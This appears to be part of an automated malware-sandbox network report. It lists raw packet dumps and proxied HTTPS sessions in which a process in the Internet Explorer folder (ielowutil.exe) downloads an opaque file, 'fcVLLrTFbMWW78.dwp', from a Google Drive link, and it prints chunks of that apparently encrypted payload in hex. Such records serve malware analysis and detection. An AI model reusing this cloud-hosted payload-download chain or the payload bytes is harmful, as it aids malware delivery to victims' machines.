                                                                                                                  Feb 13, 2023 19:00:33.199246883 CET618INData Raw: 57 2e 54 12 ba 7a e6 20 2b 14 1d 83 5b 23 5d d6 cd 59 6e 18 70 91 27 40 05 93 6c 8b b9 58 62 91 15 f1 2f 10 5b 95 4c 30 56 0d ba 5c 87 5b 90 36 b5 0d 96 ae 43 b6 0f 94 4d 18 9c 9b 86 4b 96 f0 1e 5d 79 b5 92 63 41 b0 d4 46 b3 ea a2 10 91 bd af 5c
                                                                                                                  Data Ascii: W.Tz +[#]Ynp'@lXb/[L0V\[6CMK]ycAF\#oF|hH[;L2?T'Y!\k^=J`$LVGUj5%J0z3fVITNH5O$D$%6_j?r@l{Jd7WR'w=Mu.H.fdAp
                                                                                                                  Feb 13, 2023 19:00:33.199357033 CET619INData Raw: 78 e4 0c f5 04 ca 8f 98 99 9e 00 f5 c8 19 e9 09 90 c5 18 7f d4 4c f4 04 2c 1b 13 81 58 7d f4 f0 7d a3 9c 9c 81 9e 8f f0 f8 99 e7 29 b8 9e 32 e3 3c 01 cf 13 66 9a 27 60 79 fc 0c f3 04 24 8f 9d 59 9e 8c 62 ff 8c f2 04 b0 7b 66 92 27 40 db 3b 83 3c
                                                                                                                  Data Ascii: xL,X}})2<f'`y$Yb{f'@;<O?SlC{KAvR$}IS>-1[rA6}qYCy.zoM6Ot|/I^8,CUgg'ilujP=[=UR&2d`zpt
                                                                                                                  Feb 13, 2023 19:00:33.199378967 CET620INData Raw: 05 6a 1b d8 48 6f f3 eb 99 14 df b0 22 46 8f 97 51 ae 59 15 2e 78 f9 0a a4 37 48 ae 6b 24 d8 86 ed d7 cf 6c cc 3a 2e 17 ed dd 3f 8f 5c f9 ec 97 95 1a b4 70 27 48 3c 4f 27 f7 6f c9 9a e5 f9 13 29 5c e7 46 7d 75 a6 11 2e 58 35 9c ae e2 24 1a ce 0a
                                                                                                                  Data Ascii: jHo"FQY.x7Hk$l:.?\p'H<O'o)\F}u.X5$Ld! jM=+Tw9IV-hzh>^/5eEx,I*f6k$yxxFQ("y/pr8abX-b(Z~c8J%+|p9NE\H\IpVr
                                                                                                                  Feb 13, 2023 19:00:33.199398041 CET622INData Raw: e8 70 46 28 a9 b6 22 a1 fb 25 dd 6b 4c 20 d7 a3 20 e8 bb c0 fc 5b d0 5f 4f d0 eb 30 f4 7f 59 41 b7 14 79 dd 6f a3 58 66 ab 98 61 02 50 2a ee 15 f4 ce 58 fa b7 2c bf a2 2c 77 6e d5 f9 57 95 68 73 a4 ae 2e bd 8e f4 1d 12 f0 71 c7 dc 39 56 c0 cd c6
                                                                                                                  Data Ascii: pF("%kL [_O0YAyoXfaP*X,,wnWhs.q9V e+q,(xW@Wvrsn}pQ^kY t"rCWB=uKm]o{F<JB{':#Y[<v1i/1e
                                                                                                                  Feb 13, 2023 19:00:33.324253082 CET623INData Raw: 3a 86 88 65 38 92 a4 b4 8e 20 13 86 76 5b f7 00 85 02 d2 46 b3 af af f1 b5 26 63 26 4b 19 3f 76 a9 69 24 4f 58 c8 17 59 12 f1 02 7e 92 e6 88 fc b0 59 20 88 f3 0b e5 6a ba 8c ab dd ac 69 19 de bd 68 42 23 a4 61 8e b4 84 eb f1 08 32 72 75 31 84 61
                                                                                                                  Data Ascii: :e8 v[F&c&K?vi$OXY~Y jihB#a2ru1aMss8& SY\n/tc[dvY1[M0KRNecH_Exl%mMU5a8y*bQHoJ?{s\Is0N;t7


                                                                                                                  HTTPS Proxied Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  0192.168.11.2049825142.250.186.46443C:\Program Files (x86)\Internet Explorer\ielowutil.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-02-13 17:58:08 UTC0OUTGET /uc?export=download&id=1kMGYAplkbjctjdnlsJTgbdkYzAHnVHuE HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Host: drive.google.com
                                                                                                                  Cache-Control: no-cache
                                                                                                                  2023-02-13 17:58:09 UTC0INHTTP/1.1 303 See Other
                                                                                                                  Content-Type: application/binary
                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                  Date: Mon, 13 Feb 2023 17:58:09 GMT
                                                                                                                  Location: https://doc-10-2g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0fultl13jo81v7hfp988qo08b984m263/1676311050000/07588391332409747894/*/1kMGYAplkbjctjdnlsJTgbdkYzAHnVHuE?e=download&uuid=0b7f7b61-8846-47e3-a792-0fa9790c296c
                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                  Content-Security-Policy: script-src 'nonce-xribrB2XvtYKNbudSb8IKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                  Server: ESF
                                                                                                                  Content-Length: 0
                                                                                                                  X-XSS-Protection: 0
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  1192.168.11.2049826172.217.18.1443C:\Program Files (x86)\Internet Explorer\ielowutil.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-02-13 17:58:09 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0fultl13jo81v7hfp988qo08b984m263/1676311050000/07588391332409747894/*/1kMGYAplkbjctjdnlsJTgbdkYzAHnVHuE?e=download&uuid=0b7f7b61-8846-47e3-a792-0fa9790c296c HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Host: doc-10-2g-docs.googleusercontent.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2023-02-13 17:58:09 UTC1INHTTP/1.1 200 OK
                                                                                                                  X-GUploader-UploadID: ADPycduOGdd2D967trFpmGtoY4KwDXejGpIipZfcJb8WzUSi69c5zi9OiN5XWxPt8fE4sDxWs7rbU1mJqHAcCrA1kDATuUmMhQZe
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Disposition: attachment; filename="fcVLLrTFbMWW78.dwp"; filename*=UTF-8''fcVLLrTFbMWW78.dwp
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context
                                                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                  Content-Length: 190016
                                                                                                                  Date: Mon, 13 Feb 2023 17:58:09 GMT
                                                                                                                  Expires: Mon, 13 Feb 2023 17:58:09 GMT
                                                                                                                  Cache-Control: private, max-age=0
                                                                                                                  X-Goog-Hash: crc32c=x94uTQ==
                                                                                                                  Server: UploadServer
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close
                                                                                                                  2023-02-13 17:58:09 UTC5INData Raw: 93 34 b0 46 ea 00 b7 d6 eb 65 ba 01 18 71 66 2e 4b 21 60 0b 49 1f 85 b4 e2 3f 1d b5 15 ee 7c 85 10 c2 a7 06 6c 3d c0 8e 6a 0d 47 9a 2a 71 18 e4 34 11 ba 9e d3 6c 85 ad 93 ea 02 fa 00 4d 2a f8 be 4c e6 6a 67 13 9a e6 7d d7 de 67 c3 e0 f9 2a 54 85 b1 19 2b cc 16 e8 39 54 43 07 9d cc 03 b2 a5 d9 5e e8 86 6a 3a 55 66 86 c5 18 9d b0 87 c0 0f 16 fb 83 89 5f f9 12 36 80 0c bc a5 10 24 d9 24 2a 01 aa 0c 1a a8 0a ff 58 a1 50 01 87 73 f4 aa a2 5c 6e cf 8e 3c 5d 2a 3b c6 6b 8d c3 5b 45 50 58 24 49 49 5e 08 46 ee 00 16 a0 b1 ad 4f 15 e1 95 85 c7 9d ea b5 7b c0 fd 97 ec 91 ce 13 a8 cd c7 02 f9 f9 2e f4 70 ac 3a 80 f4 d2 8d db 37 41 e3 db 47 08 5b 06 5c 2b 17 df c3 12 f2 41 9b 69 f1 91 d7 b0 4f 4e ab 78 aa 3d 19 5c 22 93 39 46 01 7a ea 4b a2 cf 9a d8 df bb 46 0f 18 61
                                                                                                                  Data Ascii: 4Feqf.K!`I?|l=jG*q4lM*Ljg}g*T+9TC^j:Uf_6$$*XPs\n<]*;k[EPX$II^FO{.p:7AG[\+AiONx=\"9FzKFa
                                                                                                                  2023-02-13 17:58:09 UTC9INData Raw: cf a8 5e 55 5b 36 39 78 c6 75 e5 3e 3a a8 c6 01 d7 4b 20 7c 67 d2 7d 01 8f 46 41 71 2b f9 9a 2d 01 dd 3e 65 84 55 16 42 28 5e a9 c0 2f 5f 38 6b 06 bc c7 6d f3 25 9e 89 e6 85 58 91 b2 c7 5c d0 5c d3 78 7c d8 18 14 4d 11 70 c1 f2 69 da 34 77 72 00 e8 7d 4f 27 be 98 eb c8 c3 35 aa a0 53 c8 73 21 c3 9d b4 77 ba 14 eb ee 49 fe b1 8f 66 dd 6d fd 99 fa 0c 15 6f 5b 01 35 36 dd 4d 68 3c cf 60 a9 e7 4d 88 fa 40 8d 9f a4 04 24 c0 70 9b c9 18 3f d4 02 3b e4 9d 36 0c fc 5c 33 0c ee 09 22 06 da 99 48 03 31 d0 e1 33 a0 99 95 c5 cb 48 ce 1b 2f 04 be 01 8a 4d 0d a4 b0 8c 09 42 9a c1 8b c2 a0 06 53 05 73 0b a9 75 eb ae 4d 7c ae c5 39 71 ef 02 ff a1 0e c8 34 b3 80 73 26 46 83 77 61 a7 ed 5d 00 2f 9f 7f ab b5 d7 89 58 49 53 6a 13 92 48 63 09 aa d1 9f 8b f0 52 17 ae 59 17 b9
                                                                                                                  Data Ascii: ^U[69xu>:K |g}FAq+->eUB(^/_8km%X\\x|Mpi4wr}O'5Ss!wIfmo[56Mh<`M@$p?;6\3"H13H/MBSsuM|9q4s&Fwa]/XISjHcRY
                                                                                                                  2023-02-13 17:58:09 UTC13INData Raw: 8b 2c 8c c3 94 24 ae ed 84 c2 74 37 73 47 8f 9c 0d 12 73 a0 58 18 98 93 5d fa 1e a8 99 e8 4f 76 3a 8c 4e cd bb 63 e3 5f 0a 03 39 36 1a 1a 0a a4 d6 a8 61 18 2d 15 66 4a 48 55 39 9d fb ef 4c a1 cd ff cc 0b ed bf 1d 11 bd a2 46 61 3a 5b 06 74 50 f1 0b 7e 51 41 69 7b 37 24 2c 8c f5 70 81 3c 6c 1e e2 0c 87 b9 67 18 c1 dd d0 2f bd 14 34 cd ac 2e 70 18 44 49 5d c8 ab a5 f5 72 4e 86 c8 e3 14 be f8 8a 1a 4d 65 c0 ca a9 df ec 0b b8 fc 92 64 af 66 70 b4 55 e9 f0 e6 12 cc 4e b5 9c 09 87 a2 69 fa ec 87 6f f1 9b d5 8d cc d2 20 b2 0e a6 7c 4c 88 e0 7b 69 30 4c dc 8b f8 68 59 e5 69 2d a7 ba 23 5e 99 00 20 ec 42 b7 93 b1 1b eb cf 0f fb dd c4 24 80 c1 84 6c 53 dd 38 2a 07 08 2b bc 49 6f 62 0c f1 40 d2 48 bc 15 ac 40 f3 13 8a d7 13 b4 9d 46 58 fd 41 ef 87 4c 1b b2 47 5a 85
                                                                                                                  Data Ascii: ,$t7sGsX]Ov:Nc_96a-fJHU9LFa:[tP~QAi{7$,p<lg/4.pDI]rNMedfpUNio |L{i0LhYi-#^ B$lS8*+Iob@H@FXALGZ
                                                                                                                  2023-02-13 17:58:09 UTC17INData Raw: 5c 99 c4 00 59 8a a5 4d f7 58 bb 36 8b b3 dc f4 5a 62 6d 4a f6 82 6d 8f ac 50 dc b7 7b 5e 5b 58 1a fa ae dd ff e0 42 d8 a4 1a 83 e5 01 c0 0a 54 a7 62 5b ce b7 fd be 10 ad 34 e8 e3 43 24 fc 58 05 ca 1d e4 61 bd d4 7f 1b 52 64 e6 eb f6 70 f9 73 13 e2 b2 ca 9f 3d d7 e1 7d 66 71 b4 15 8d 75 f4 33 8f 69 c3 a0 ca b3 9b 92 ec ad 27 4b 56 fc de 0b 30 af b1 cf 76 c7 61 2d d5 9f 8e 97 b8 c8 31 c0 c8 30 cc 9d 1b 92 f8 02 da 75 a9 54 99 00 69 d9 3f 59 bf 11 d3 f8 c6 d9 fe d7 c4 97 b2 47 3c d3 3a e7 18 84 eb f3 f7 10 40 a9 4c d5 c6 f1 a1 64 a2 44 7d 64 37 1a a9 df 2c 8f 7b 57 4f b6 0b 5e b4 f3 13 13 f5 70 4e 3f 95 0a f9 22 a5 c6 cc 3e f8 30 7c 53 d1 89 5b ef 9b dd da 87 f9 cb 4a 07 97 8a e6 4e 0a 38 9a e8 97 e9 cd d2 12 8e 12 74 0c 5a 61 65 57 b3 61 25 7f 73 86 4b aa
                                                                                                                  Data Ascii: \YMX6ZbmJmP{^[XBTb[4C$XaRdps=}fqu3i'KV0va-10uTi?YG<:@LdD}d7,{WO^pN?">0|S[JN8tZaeWa%sK
                                                                                                                  2023-02-13 17:58:09 UTC17INData Raw: 0c bb 3d 52 74 a7 c6 bd aa 79 53 1f c7 5f 02 2e db 31 82 ab 66 33 9a 38 9c 1a 4d 1e 8b 2e 44 77 08 97 8f 9b d3 98 f4 7f 4f 34 81 69 7c 5e 78 1b 1c 17 79 93 44 80 91 18 ae 52 41 05 18 33 b5 3f fe df d3 a6 02 26 dc e3 1c 99 0c 67 b5 59 6e b7 c7 47 31 da 3a f7 97 fe 4b 3e ef dd 7c 2e 31 ca d2 c0 d8 0b 88 12 d5 3d 8a 91 2f 12 dc c0 17 b2 09 f4 ac 06 4f 70 51 be 75 aa a5 9c e0 5e e1 00 e3 f1 02 af 39 4d 96 6b ac f0 09 8b ed a2 3e 6a 02 24 da 9c 8f 84 a9 b3 34 96 dc d0 6b ce bb 42 ae 93 28 dd 03 10 05 09 e7 3e 51 1d 51 45 32 56 72 56 96 d1 f2 5e 72 b1 0a 8b 59 6f 60 c7 ee 75 60 a3 66 c6 74 4e b2 be 25 19 53 1b 35 91 1b 4b 29 29 5d ce 2a a3 e7 4e 71 40 5b 17 48 a9 72 c2 9f a3 df 1b 84 f9 04 9f 2b a9 5c 6e 90 e6 ca 61 56 0a e0 33 51 cb 44 a0 b0 52 5e fa 74 e4 c2
                                                                                                                  Data Ascii: =RtyS_.1f38M.DwO4i|^xyDRA3?&gYnG1:K>|.1=/OpQu^9Mk>j$4kB(>QQE2VrV^rYo`u`ftN%S5K))]*Nq@[Hr+\naV3QDR^t
                                                                                                                  2023-02-13 17:58:09 UTC18INData Raw: 18 be d2 e3 61 f4 b6 8a fe ef 0a db 15 a5 e2 51 77 12 e8 6b 36 08 42 b0 31 0f 9d 6b 40 d9 62 ba ff 96 71 c6 44 10 5f bc bf a8 36 43 83 ca 64 2d c1 aa 89 20 b4 2d fb 9a 60 c2 e9 4f 6d 14 52 e7 93 23 65 16 83 cf 9b b9 fb d6 4b 1b d4 33 be a2 11 2c 68 ff e7 32 47 54 07 e6 38 91 3f dd f4 90 e2 f2 0e b9 03 5c 79 11 00 8c c0 4f 24 4f 9d 83 92 2b a8 3f 66 ca 39 2a 82 0a 53 b9 52 b9 b0 9d d6 90 eb 2e f5 1b 4c 5f f2 e9 07 2c 0a d1 f9 0a 03 29 03 ec f9 49 61 4d 5e 40 9f ec b9 b2 27 48 6d 4d 73 49 46 87 18 65 b7 ee 5a e0 33 55 55 ff 63 18 55 c5 72 32 b9 4a 62 87 17 2b b3 a4 0c 03 a1 fd 3e 65 4c 78 59 4f b6 ae 7c 72 e2 76 9e dd da 2b 77 78 a5 8c 57 11 c4 a3 25 38 6a a6 96 97 4d ad 9b 10 bf 23 7e 22 dc 78 eb c9 75 f9 71 ac 96 ce 96 94 ec e1 ae 12 0c 9c 41 2b 1a ef 53
                                                                                                                  Data Ascii: aQwk6B1k@bqD_6Cd- -`OmR#eK3,h2GT8?\yO$O+?f9*SR.L_,)IaM^@'HmMsIFeZ3UUcUr2Jb+>eLxYO|rv+wxW%8jM#~"xuqA+S
                                                                                                                  2023-02-13 17:58:09 UTC20INData Raw: 6a 1f bc 9a 1e 93 81 2e 92 68 59 42 38 a9 18 1a a2 16 61 68 55 28 11 7c af 88 bc 40 67 99 c7 b7 25 c1 20 fb ca 3d a9 24 9a 26 04 70 23 b3 27 f2 06 98 de 95 96 6f 1b 69 33 d3 31 63 20 ad 9b f4 95 2f b8 8e 5d 25 06 5b 23 ba 4c b3 e4 c1 53 0b 14 0f 09 de e3 fe fd 58 42 d2 67 36 d8 35 bd e0 6a 1c fc 55 79 63 7e 9c b2 d9 76 f1 80 87 37 36 69 d4 03 d2 0d b0 13 13 99 24 1b 64 d8 21 66 2c 9f dd f7 b8 67 f1 34 05 85 03 fb 25 5d b0 05 d7 3f 6e 88 6b a4 70 d8 f8 28 13 88 b9 a5 b7 51 54 c2 94 d9 78 05 aa 7c ac 0f 39 b1 ad 9e 47 5d 88 f6 e5 66 86 e3 63 9b 7d b4 3a 39 46 87 5a d4 e8 80 59 f1 4c e7 c9 e1 ab 06 f5 2d 91 a1 32 a9 4e 27 77 36 15 97 da f6 5c c5 37 93 78 16 39 d7 68 09 97 53 91 28 07 22 45 6b e5 d4 e5 1e 5c 21 23 cf 8c 41 ba 32 03 dd f9 24 13 23 06 44 c1 11
                                                                                                                  Data Ascii: j.hYB8ahU(|@g% =$&p#'oi31c /]%[#LSXBg65jUyc~v76i$d!f,g4%]?nkp(QTx|9G]fc}:9FZYL-2N'w6\7x9hS("Ek\!#A2$#D
                                                                                                                  2023-02-13 17:58:09 UTC21INData Raw: ed 69 cd 7b 11 8b 36 7d 43 8c e9 71 74 06 38 82 be 21 5b 10 2b 04 0c d9 4d db f7 0e 79 2a 8a 54 7c ee e1 33 a8 ee 09 58 f3 cd 75 36 9e 9c 69 12 88 3e fc b9 c2 fb 21 76 e3 f4 e7 01 19 48 37 d8 5e 67 f0 4a 09 b5 f4 66 c7 41 0a dd da c7 0a e6 b8 41 31 18 5a 26 73 5c b7 65 30 0d ba 46 77 fc 46 12 b7 34 5c 2c 1f 30 95 82 33 10 42 40 5d 0f 11 d5 8a b2 4d 40 50 38 a0 27 c1 92 36 48 1c 93 1e 77 25 3d fc a8 64 90 8b 6c 53 ea dd 39 2b c7 da ad 0d 70 01 75 53 c5 de 3d 17 26 7c 90 b0 f2 d2 80 79 8a e6 c6 cc 73 76 d5 55 09 70 97 6a ce 61 0f b6 81 e3 84 f2 90 01 a1 43 d0 43 79 d0 c7 67 13 ad 98 8b 63 97 93 fa 7b 07 c4 c5 e6 1a cb 3a a5 41 ff e9 64 8f 8e e0 90 5b aa d7 5e 56 73 7e 2a d8 4e 46 19 9a e8 f9 47 b3 5b 11 a6 87 ee c0 72 99 07 a6 e7 83 fd 00 dc 04 1b 1a 58 4b
                                                                                                                  Data Ascii: i{6}Cqt8![+My*T|3Xu6i>!vH7^gJfAA1Z&s\e0FwF4\,03B@]M@P8'6Hw%=dlS9+puS=&|ysvUpjaCCygc{:Ad[^Vs~*NFG[rXK
                                                                                                                  2023-02-13 17:58:09 UTC22INData Raw: 3e 8c ba 62 26 0f 1f 27 b0 dc e4 ea d1 36 e4 73 b9 25 82 27 26 72 bd 02 2f 8b a2 1f 08 f9 75 58 0b be d8 57 85 1f b0 93 cf 9e 89 f0 ba f9 25 2c cd c9 5c 9e 97 11 a1 9a bb 71 77 c8 bf e2 da ca db 92 0e 50 d2 09 b9 e6 1f 73 c3 d7 eb dd 11 f4 68 4e 9b 9a 0c a2 a9 39 58 9f 4d 21 17 0d f0 45 6e 50 69 eb e5 81 ab d2 14 21 34 77 6d bd 4c 05 a6 f1 6e 61 19 9d b2 a3 ca 3f 55 cb af 08 6d 2f 8e 89 42 fd 9a eb af b4 b5 41 e6 b4 eb d7 dc 40 c0 f6 aa 1c 18 b1 1a 38 fa aa 58 fe 95 43 45 77 1c 72 9f a6 8a bc 07 26 95 42 1d d5 54 a8 2c 35 9d 26 99 81 f2 81 24 d5 34 85 da 5a 4e fd dc 26 6e 5e 65 51 af 5e d9 33 29 a0 9a 7d bc 07 52 02 81 d0 4a 59 3d d2 35 96 f4 cd 75 6c 66 50 72 82 02 03 38 ed 9d fa f9 59 fe f7 ce 22 d1 0f 50 cf d9 8f 50 45 3a 44 7a a2 7c 59 a7 37 b8 ef 1a
                                                                                                                  Data Ascii: >b&'6s%'&r/uXW%,\qwPshN9XM!EnPi!4wmLna?Um/BA@8XCEwr&BT,5&$4ZN&n^eQ^3)}RJY=5ulfPr8Y"PPE:Dz|Y7
                                                                                                                  2023-02-13 17:58:09 UTC23INData Raw: 33 7f 08 81 2c 67 7d 6d 95 3b 30 c5 bd 63 00 be 79 8f 46 3c 30 f7 72 72 39 62 24 11 6f 3e c0 fc 62 ef 39 cb 3b 04 91 74 af 30 82 2a c0 69 92 9d 7a 16 48 07 c3 77 bb a2 a0 3e 8f c5 e7 b5 b1 ec 36 75 f1 dc a6 90 6e 0a b2 dd 38 7e 89 94 bb 8a ba b5 20 c2 a1 0b 37 23 2b dc 9b 2e 2e 6d 30 8b d2 b7 14 db db 4a b0 ab f3 02 be 61 0a 88 2e fb d8 07 59 1b de 42 fb 9e 88 f7 34 30 d9 5c 06 05 f5 28 77 8c bf b2 a4 5f ee a1 60 5f e1 c4 9b 4f 78 c7 8f 72 51 c8 db 0f c4 a7 32 a2 bc 4b e8 df 09 02 c1 1b 43 ad f1 1a 60 f7 02 55 f1 51 de ff a5 29 8e 03 34 22 ed 79 06 8e c0 6c ec 5c 69 d5 0a 07 75 43 c4 bc 90 a9 15 f0 20 26 c3 7b d0 48 51 a2 65 e7 e4 2a e2 f2 08 a8 9d e6 82 31 30 ce 9c 0e a7 b3 14 6f f4 55 91 c3 c6 9d 24 7e 6b ae d9 5e 82 89 25 81 b6 f0 9e 81 56 87 24 45 73
                                                                                                                  Data Ascii: 3,g}m;0cyF<0rr9b$o>b9;t0*izHw>6un8~ 7#+..m0Ja.YB40\(w_`_OxrQ2KC`UQ)4"yl\iuC &{HQe*10oU$~k^%V$Es
                                                                                                                  2023-02-13 17:58:09 UTC25INData Raw: 45 f5 2f 62 18 ad 43 6c fe c6 fa 5c 62 dd ea 00 8b 5a 00 69 fa 14 11 c5 97 57 36 d1 a4 ba 04 f6 af 00 07 c4 b4 82 55 36 a7 5d 98 29 5f 91 90 d1 2d dc e3 7d 4c 35 f1 3a ba 69 c3 8a d1 5a b6 b1 7a 13 ec 54 0d eb 7b 9d 77 f5 e9 a7 99 60 0b 50 b8 83 d8 92 9b 72 32 71 89 ae 46 84 21 57 51 30 9f 09 5d 40 cd cd ca df bc d8 1f 61 2d 2e 6b a1 a7 43 48 0e 23 ad cd 65 d9 47 2d 95 a6 76 c9 b0 50 d1 dc 23 e9 ee bc 67 ad 8e 71 8e ea 34 25 c6 37 92 80 14 5a f4 af 4f a3 56 fa 08 c1 cf 52 fb 6a a7 17 15 25 d5 23 1f 7c 3e d7 58 74 16 0c d8 d8 c0 3b 0c f5 ef 3d dd 82 93 f7 41 8a 60 f7 e6 d1 8f 7a 41 8d 26 e8 6c c4 28 62 2f 01 db 4d 20 f4 b1 84 7e 51 d1 fb a4 98 b7 09 83 8b 47 fa 0b c7 51 2e 49 df 83 e2 b9 b0 6b 13 47 5a e7 bb 43 fe 9c 17 1a c3 61 a2 ab 3e da 26 13 51 a3 0b
                                                                                                                  Data Ascii: E/bCl\bZiW6U6])_-}L5:iZzT{w`Pr2qF!WQ0]@a-.kCH#eG-vP#gq4%7ZOVRj%#|>Xt;=A`zA&l(b/M ~QGQ.IkGZCa>&Q
                                                                                                                  2023-02-13 17:58:09 UTC26INData Raw: c1 22 17 18 34 37 ba 29 92 04 42 ca b3 ba ad aa a9 ac 18 b3 b3 d5 78 d9 4c 95 36 89 60 4e 1e 64 01 04 34 18 b5 e8 d8 be c1 c2 56 25 ff 75 fe 83 8a 6f 69 70 bb 50 b7 5d a3 29 ab 78 7c 9f 78 71 74 35 ac 8f 61 dd 71 52 a6 9b 2f ee b8 f9 f8 fd 7f e6 e5 69 3c a2 49 fa 7c 84 bf d0 88 50 3c b0 1a 36 e9 cf 35 f8 4c d0 36 73 1a 2b 1c cb 7d 6a 61 f1 17 f7 c8 c8 a7 6d 5e f9 d4 b3 cd 24 ed 62 1d e3 35 78 bc 6e 7c 64 5b a1 13 74 bc be aa 51 9d bc a0 50 fa db 7f c2 06 0a 22 c0 0f 0e 2d 05 fe cf d1 f9 b5 c9 ef 63 bc bf dd 4d d0 0f a2 73 52 92 35 31 36 25 a7 e4 6f 21 aa 9d 95 af 5c b3 53 9c 64 8e 43 1c 86 63 1e 33 23 5f 56 8d bd 3f 76 a0 f6 f7 a7 81 80 fa e3 b7 60 5f 52 9e 9c 28 d1 09 40 42 1c 3f ec 88 d2 49 bb d2 16 24 bc dc 2b 10 16 2f d2 7f a7 04 f7 f2 95 bb 58 37 ac
                                                                                                                  Data Ascii: "47)BxL6`Nd4V%uoipP])x|xqt5aqR/i<I|P<65L6s+}jam^$b5xn|d[tQP"-cMsR516%o!\SdCc3#_V?v`_R(@B?I$+/X7
